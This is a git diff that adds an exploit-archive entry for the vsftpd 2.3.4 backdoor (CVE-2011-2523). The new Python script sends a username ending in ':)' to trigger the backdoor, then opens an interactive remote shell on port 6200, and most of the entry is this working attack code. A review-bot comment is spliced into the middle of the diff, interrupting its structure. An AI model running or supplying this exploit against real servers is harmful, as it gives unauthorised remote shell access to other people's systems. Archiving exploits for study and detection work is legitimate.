diff --git a/exploits/unix/remote/49757.py b/exploits/unix/remote/49757.py
new file mode 100755
index 000000000..e8b888c5e
--- /dev/null
+++ b/exploits/unix/remote/49757.py
@@ -0,0 +1,40 @@
+# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
+# Date: 9-04-2021
+# Exploit Author: HerculesRD
+# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
+# Version: vsftpd 2.3.4
+# Tested on: debian
+# CVE : CVE-2011-2523
+
+#!/usr/bin/python3
+
+from telnetlib import Telnet
+import argparse
+from signal import signal, SIGINT
+from sys import exit
+
+def handler(signal_received, frame):
+ # Handle any cleanup here
+ print(' [+]Exiting...')
+ exit(0)
+
+signal(SIGINT, handler)
+parser=argparse.ArgumentParser()
+parser.add_argument("host", help="input the address of the vulnerable host", type=str)
+args = parser.parse_args()
+host = args.host
+portFTP = 21 #if necessary edit this line
+
+user="USER nergal:)"
+password="PASS pass"
+
+tn=Telnet(host, portFTP)
+tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
+tn.write(user.encode('ascii') + b"\n")
+tn.read_until(b"password.") #if necessary, edit this line
+tn.write(password.encode('ascii') + b"\n")
+
+tn2=Telnet(host, 6200)
+print('Success, shell opened')
+print('Send `exit` to quit shell')
+tn2.interact()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 175338e5b..4dddecebe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
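Review bot: The `#!/usr/bin/python3` line sits on line 9 of the new 49757.py, below the metadata comments, so it is an ordinary comment and the 100755 mode does not make the file run under python3; a shebang is only honoured as the first line. `from telnetlib import Telnet` also ties the script to older interpreters, since telnetlib was deprecated by PEP 594 and removed in Python 3.13, and the "Tested on" header line records no interpreter version. For readers who use this entry to validate detections, a header comment such as `# Indicators: FTP USER value ending in ":)", then a TCP listener on port 6200` would document what the code below does on the wire.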
@@ -18439,6 +18439,7 @@ id,file,description,date,author,type,platform,port
 49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
+49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,